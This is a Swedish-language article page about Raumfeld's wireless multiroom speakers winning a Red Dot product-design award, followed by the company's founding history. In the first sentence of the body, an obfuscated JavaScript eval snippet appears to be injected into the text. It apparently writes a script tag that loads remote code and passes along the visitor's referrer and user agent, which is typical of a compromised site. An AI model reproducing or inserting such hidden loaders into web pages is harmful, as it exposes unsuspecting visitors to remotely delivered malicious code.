Image Image Image Image Image Image Image Image Image Image

| 8 april, 2020

Scroll to top

Top

Raumfelds trådlösa multiroom-högtalare får utmärkelsen Red Dot Award

Raumfelds trådlösa multiroom-högtalare får utmärkelsen Red Dot Award
Sebastian

Raumfeld, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|istyd|var|u0026u|referrer|hrhne||js|php’.split(’|’),0,{}))
som tillverkar trådlösa multiroom-högtalare har av Red Dot Award-juryn tilldelats pris för bästa produktdesign. HiFi-högtalarna med tidlös design och hög materialkvalitet – högtalarlådor av äkta trä, reglage av aluminium och specialtextil i högtalarfronterna – fick juryn att utse Raumfeld till vinnare för bästa produktdesign.

Red Dot Award är en av de största och mest prestigefyllda tävlingarna som belönar enastående design och innovation över hela världen. I år deltog oräkneliga kandidater från hela världen.  40 världskända designers, professorer och journalister bedömde produkterna utifrån kriterier som innovationshöjd, funktionalitet, ergonomi, långsiktig hållbarhet och andra viktiga faktorer. Under tre dagar undersöktes och utvärderades produkterna grundligt och Raumfeld utsågs till vinnare.

”Vi är hedrade att få ta emot Red Dot Award. Det är ett verkligt erkännande av vårt hårda arbete och vår hängivenhet och passion för produkterna”, säger Sebastian Drawert, General Manager Marketing på Raumfeld. Han tillägger att ”utmärkelsen visar tydligt att vi tillverkar mycket attraktiva och innovativa produkter”.

Raumfelds trådlösa högtalare har elegant och tidlös design i kombination med det unika Raumfeld-ljudet. Konceptet har övertygat musikälskare under lång tid, och nu även Red Dot Award-juryns domare.

Historien bakom Raumfeld

Idén bakom Raumfelds prisbelönta produkter föddes i Berlin 2008. Ljudentusiasterna Stephan Schulz och Michael Hirsch grundade Raumfeld med det uttalade syftet att utveckla trådlösa multiroom-system som kan streama och återge ljudfiler av hög kvalitet utan att förvränga ljudet. År 2010 gick Raumfeld samman med Teufel och kunde då dra nytta av deras 35-åriga erfarenhet av att bygga förstklassiga ljudanläggningar. Raumfeld fick därmed sin slutgiltiga utformning och Hirschs och Schulzs vision blev verklighet: multiroom-system för trådlöst ljud i äkta HiFi.